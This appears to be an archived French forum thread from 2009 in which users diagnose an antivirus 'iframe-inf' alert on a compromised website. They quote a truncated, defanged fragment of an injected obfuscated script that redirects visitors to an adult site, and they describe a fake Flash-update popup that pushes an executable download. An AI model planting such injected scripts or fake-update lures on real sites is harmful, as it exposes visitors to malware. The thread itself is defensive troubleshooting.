iframe-inf

Le
Stephane Santon
Bonjour,

J'ai une amie (au téléphone) sur Firefox qui reçoit une alerte Avast en
visitant une page Web :
http://alger50.org/cms/index.php?option=com_content&viewÊtegory&idV&Itemid—

Un virus a été trouvé : iframe-inf

Je n'ai pas avast.
Qu'en est-il exactement ?

Merci
Vidéos High-Tech et Jeu Vidéo
Téléchargements
Vos réponses
Gagnez chaque mois un abonnement Premium avec GNT : Inscrivez-vous !
Trier par : date / pertinence
Roland Garcia
Le #18311301
Stephane Santon a écrit :
Bonjour,

J'ai une amie (au téléphone) sur Firefox qui reçoit une alerte Avast en
visitant une page Web :
http://alger50.org/cms/index.php?option=com_content&viewÊtegory&idV&Itemid—


Un virus a été trouvé : iframe-inf

Je n'ai pas avast.
Qu'en est-il exactement ?




C'est visiblement une fausse détection heuristique.

--
Roland Garcia
xavier
Le #18311411
Roland Garcia
C'est visiblement une fausse détection heuristique.



Non.

Safari couine pareillement. Ce qui m'a permis d'apprendre qu'il
détectait les iframes douteuses.

Et il détecte bien la redirection vers un site de cul :


--
XAv
Disponible au 1/9/2009
Roland Garcia
Le #18311501
Xavier a écrit :
Roland Garcia
C'est visiblement une fausse détection heuristique.



Non.

Safari couine pareillement. Ce qui m'a permis d'apprendre qu'il
détectait les iframes douteuses.



Mon Firefox ne redirige sur rien.

Et il détecte bien la redirection vers un site de cul :




Il y a effectivement au début:

<scr*pt language="javascr*pt">
document.write( unescape( '%3C%69%66%72%61%6D%65 etc.......;
</scr*pt><meta http-equiv="content-type" content="text/html;

qui tente de rediriger vers sexonline.xxxx

Un "virus" est un truc dangereux pour la machine, là je ne vois pas.

--
Roland Garcia
Fabien LE LEZ
Le #18311581
On 05 Jan 2009 22:59:06 GMT, Roland Garcia
qui tente de rediriger vers sexonline.xxxx



Y'a pas que ça : au bout de quelques secondes, un popup me dit que je
dois mettre Flash à jour. Que je réponde "oui" ou "non", il essaie de
télécharger un exécutable.
Stephane Santon
Le #18312281
Bonjour,

Roland Garcia a écrit :
Safari couine pareillement. Ce qui m'a permis d'apprendre qu'il
détectait les iframes douteuses.


Mon Firefox ne redirige sur rien.



Je n'avais pas vu la redirection non plus.
Cette syntaxe javascript de redirection serait-elle opérationnelle sous
un autre navigateur ?

Et il détecte bien la redirection vers un site de cul :


Il y a effectivement au début:
<scr*pt language="javascr*pt">
document.write( unescape( '%3C%69%66%72%61%6D%65 etc.......;
</scr*pt><meta http-equiv="content-type" content="text/html;
qui tente de rediriger vers sexonline.xxxx



Serait-il possible que le site ait été hacké pour y mettre cette
redirection ?
Roland Garcia
Le #18314421
Stephane Santon a écrit :

Et il détecte bien la redirection vers un site de cul :


Il y a effectivement au début:
<scr*pt language="javascr*pt">
document.write( unescape( '%3C%69%66%72%61%6D%65 etc.......;
</scr*pt><meta http-equiv="content-type" content="text/html;
qui tente de rediriger vers sexonline.xxxx



Serait-il possible que le site ait été hacké pour y mettre cette
redirection ?



Le script étant en début de page ça ressemble effectivement à un ajout,
de plus c'est très courant.

J'ai soumis la page aux antivirus suivants, Avast ne dit rien et les 3
qui couinent le font sur le script ci-dessus.

a-squared OK
AhnLab-V3 OK
AntiVir HTML/Dldr.Iframe.GD
Authentium OK
Avast OK
AVG OK
BitDefender OK
CAT-QuickHeal OK
ClamAV OK
Comodo OK
DrWeb OK
eTrust-Vet OK
Ewido OK
F-Prot OK
F-Secure OK
Fortinet OK
GData OK
Ikarus OK
K7AntiVirus OK
Kaspersky OK
McAfee OK
McAfee+Artemis OK
Microsoft OK
NOD32 OK
Norman OK
Panda OK
PCTools OK
Prevx1 OK
Rising OK
SecureWeb-Gateway Script.Dldr.Iframe.GD
Sophos Mal/Iframe-F
Sunbelt OK
Symantec OK
TheHacker OK
TrendMicro OK
VBA32 OK
ViRobot OK
VirusBuster OK

--
Roland Garcia
Publicité
Poster une réponse
Anonyme